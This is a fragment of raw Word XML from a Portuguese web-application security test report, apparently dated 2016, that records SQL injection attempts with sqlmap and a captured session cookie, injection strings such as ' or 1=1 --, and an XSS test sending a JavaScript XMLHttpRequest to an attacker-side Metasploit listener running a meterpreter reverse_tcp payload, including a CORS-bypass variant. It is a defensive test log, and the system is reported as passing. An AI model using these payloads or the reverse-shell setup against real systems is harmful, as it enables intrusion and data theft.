        <w:t>escolhido para teste de injeção SQL não é injetável conforme mostra a figura 19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D0530" w:rsidRPr="003A39F6" w:rsidRDefault="008D0530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122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8D0530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0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6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>: sqlmap -r params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params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cadastro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D975CE" w:rsidRDefault="00D975CE" w:rsidP="00D975CE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975CE" w:rsidRPr="003A39F6" w:rsidRDefault="00D975C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 “cadastro”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lastRenderedPageBreak/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D975CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> cadastro” </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>escolhido para teste de injeção SQL não é injetável conforme mostra a figura 20.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="005A5292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268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5A529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1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7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r w:rsidRPr="00DB70B5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“ok”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101063" w:rsidRPr="003A39F6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lastRenderedPageBreak/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01063">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“ok” </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>escolhido para teste de injeção SQL não é injetável conforme mostra a figura 21.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="00236FDF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8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B70B5" w:rsidRDefault="005A529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</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00DB70B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração Sql Injection via Sqlmap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 Consulta Servidor -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Verificar se o campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006635A8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34569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</w:t>
      </w:r>
      <w:r w:rsidR="008C6D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r w:rsidRPr="00934569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como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="0063700A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 xml:space="preserve">”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao siape de usuários cadastrados. Comentários inline foram utilizados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o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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-se que o sistema realize o tratamento para impedir que os comentários sejam interpretados como parte da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00101063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#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 --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>Exploração via Sqlmap</w:t>
      </w:r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Utilizar a ferramenta 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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Para realizar ess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foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho HTTP de uma requisição no momento em que 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A2041" w:rsidRDefault="009A2041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06019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3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3</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Parâ</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>metros obtidos através do Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r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D65D65" w:rsidRPr="00D65D65" w:rsidRDefault="00D65D65" w:rsidP="00D65D6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FF1C9C" w:rsidRDefault="00D65D6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Espera</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-se que a tela de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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">seja </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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>consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> As figuras 23 e 24 mostram os resultados do Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00022ED2" w:rsidP="00022ED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1C4F4D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44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4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F04EFF" w:rsidRDefault="00F04EFF" w:rsidP="001C4F4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28615" cy="4064635"/>
            <wp:effectExtent l="0" t="0" r="63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5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2.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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2 e aumentar o nível de heurística </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>aplicada pelo Sqlmap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db  --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>evel 5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Pr="006473CA" w:rsidRDefault="006473CA" w:rsidP="006473CA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8C6DC7" w:rsidRPr="003A39F6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</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-se que a tela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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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4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Explorar vulnerabilidade de XSS encontrado na tela Cadastro Lotes de Vacinas na Iteração 3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751591" w:rsidRDefault="00751591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D602EF" w:rsidRDefault="00D602EF" w:rsidP="00D602EF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3315"/>
        </w:tabs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</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> executados</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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E52417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través do exploit disponível em </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit/Multi/Handler </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>com o payload windows-meterpreter-reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>usar o Metasploit para abrir um listener na porta 444 da máquina virtual que usa o Kali Linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E52417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Usar um comando GET de Javascript para abrir a conexão entre a máquina que hospeda a aplicação e a máquina virtual que usa Kali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Dessa forma, será criado um listener que fica ouvindo conexões. Quando ocorre alguma conexão externa, ele executa o payload carregado no momento, que no caso é o windows/meterpreter/reverse_tcp que abre uma conexão reversa da máquina atacada para a máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5" w:rsidRDefault="00881DA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81DA5" w:rsidRDefault="00881DA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 código abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  dotipo GET para IP_do_servidor na porta 4444 de forma assíncrona. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003E1ACB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 w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003E1ACB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 xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>new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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>XMLHttpRequest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 xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003E1ACB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>r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"GET"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>,’http://IP_do_servidor:4444’,</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white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onsolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="2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D602EF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Default="00D602EF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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Espera-se que a sessão do meterpreter não seja Abert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D602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D76012" w:rsidP="00D602EF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sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O navegador bloqueia a requisição</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> usando o filtro de CORS [6</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>]</w:t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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="pt-BR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1464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46E12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6</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00046E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Erro exibido no navegador na execução da requisição usando</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00046E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o filtro de CORS.</w:t>
      </w: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dar o mesmo script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 em um navegador diferente, para descobrir se o bloqueio da conexão ocorre em qualquer navegador ou apenas no Iceweasel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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P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sessão do meterpreter não seja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D76012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passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ao utilizar o navegador Firefox, o filtro de CORS impede a conex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400040" cy="146431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650630" w:rsidRDefault="009A2041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7</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00650630">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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Tela Cadastro Servidor – Exploração v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Cadastro Servidor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2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>Inserir um texto com uma distribuição adequada de aspa simples e comentários inline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>cadastrados. Comentários inline foram</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizados para tentar forçar o </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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teste ‘ or 1=1 --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r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1  #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B846D4" w:rsidRDefault="00B846D4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</w:p>
    <w:p w:rsidR="00B846D4" w:rsidRPr="00101063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846D4" w:rsidRPr="00906B58" w:rsidRDefault="00B846D4" w:rsidP="00B846D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a-se que o sistema realize o tratamento dos caracteres para impedir que os comentários inline sejam interpretados como parte da consulta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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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3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Javascript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Javascript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</w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">s 1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: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 xml:space="preserve">teste ‘ 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>teste ‘ or 1=1 --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  <w:r w:rsidRPr="00C97F3F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1 #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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B846D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76012">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. Nada aconteceu. Com o Javascript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4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 função de </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Javascript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654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US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1231 ); select * from usuarios;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); select * from usuarios;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0F06E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  <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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564D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devido à falta de tratamento adequado para dados inválidos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</w:rPr>
        <w:t>” o seguinte erro foi exibido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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erro:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data too long for column ‘id’ at row 1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Siape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48383A" w:rsidP="000F06E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0F06E4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eiro, deve-se s</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>alvar a requisição POST capturada pela ferramenta Burp Suite em um arquivo a parte para utilizar no Sqlmap pos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siap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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>qlmap -r paramsTelaConsServidor -p cpf --dbms=msql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</w:t>
      </w:r>
      <w:r w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>aramsTelaConsServidor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“--current-db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193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7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E4" w:rsidRDefault="009A2041" w:rsidP="000F06E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8</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Dados da requisição via POST capturada pelo Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRDefault="000F06E4" w:rsidP="000F06E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realize o tratamento sobre os parâmetros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E77F7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</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">o: </w:t>
      </w:r>
      <w:r w:rsidR="00D76012">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. Os parâmetros “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>siape</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” e “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” não são injetáveis conforme mostram as figuras 28, 29 e 30.</w:t>
      </w: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1154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5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9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 w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75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E77F75" w:rsidRPr="00A9523B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398653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23B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A9523B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30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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Siape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E77F75" w:rsidRDefault="009A2041" w:rsidP="00E77F75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>Figura 31</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CPF.</w:t>
      </w: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5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Tarefa realizada dia </w:t>
      </w:r>
      <w:r w:rsidR="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>19/05/16</w:t>
      </w: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751591" w:rsidRDefault="00751591" w:rsidP="00751591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2124"/>
      </w:pPr>
    </w:p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>r uma chamada a um listener do M</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">estasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>para executar um ataque usando M</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>eterpreter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9A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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ra burlar o filtro CORS, do navegador é necessário que sejam incluídas algumas credenciais no cabeçalho da requisição. O script abaixo simula um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requisição credenciada por meio do atributo “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>withCredencials”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i/>
        </w:rPr>
        <w:t>É esperado que a aplicação impeça a conexão.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5241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 código abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  dotipo GET para IP_do_servidor na porta 4444 de forma assíncrona.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Porém, aqui é utilizado o atributo “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>withCredencials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para burlar o filtro de CORS do navegador.</w:t>
      </w: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Pr="003E1ACB" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>withCredentials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= true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r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.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRDefault="008C6DC7" w:rsidP="000F06E4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3E1ACB">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB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 w:rsidR="008719F1"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0F06E4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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7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719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. O comando </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“withCredentials” </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
